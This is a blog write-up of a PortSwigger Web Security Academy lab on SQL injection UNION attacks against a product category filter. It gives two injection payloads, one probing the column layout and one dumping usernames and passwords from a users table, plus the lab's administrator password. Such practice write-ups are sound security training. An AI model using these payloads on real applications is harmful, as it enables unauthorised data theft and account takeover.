Lab: SQL injection UNION attack, retrieving data from other tables

Posted on 2023-04-25 | Post modified | In Security Practice｜Portswigger Web Security Academy｜SQL |

Lab: SQL injection UNION attack, retrieving data from other tables

tags: `Portswigger Web Security Academy` `Web`

Description: This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
Hint: The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Exp

Using all technique we learned before

According to union-based technique we learned before, we can consider there’re 2 columns in this database and both of them are text strings

Payload: ?category=Lifestyle' UNION SELECT 'Title name','Post content'--
Find the detailed info in users table

Payload: ?category=Lifestyle' UNION SELECT username, password FROM users--
Login as administrator
- Username: administrator
- Password: 5kg73b7jinl9plif82d3

Post author: SBK6401
Post link: https://bernie6401.github.io/Lab-SQL-injection-UNION-attack,-retrieving-data-from-other-tables/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Lab: SQL injection UNION attack, retrieving data from other tables

tags: Portswigger Web Security Academy Web

Exp

tags: `Portswigger Web Security Academy` `Web`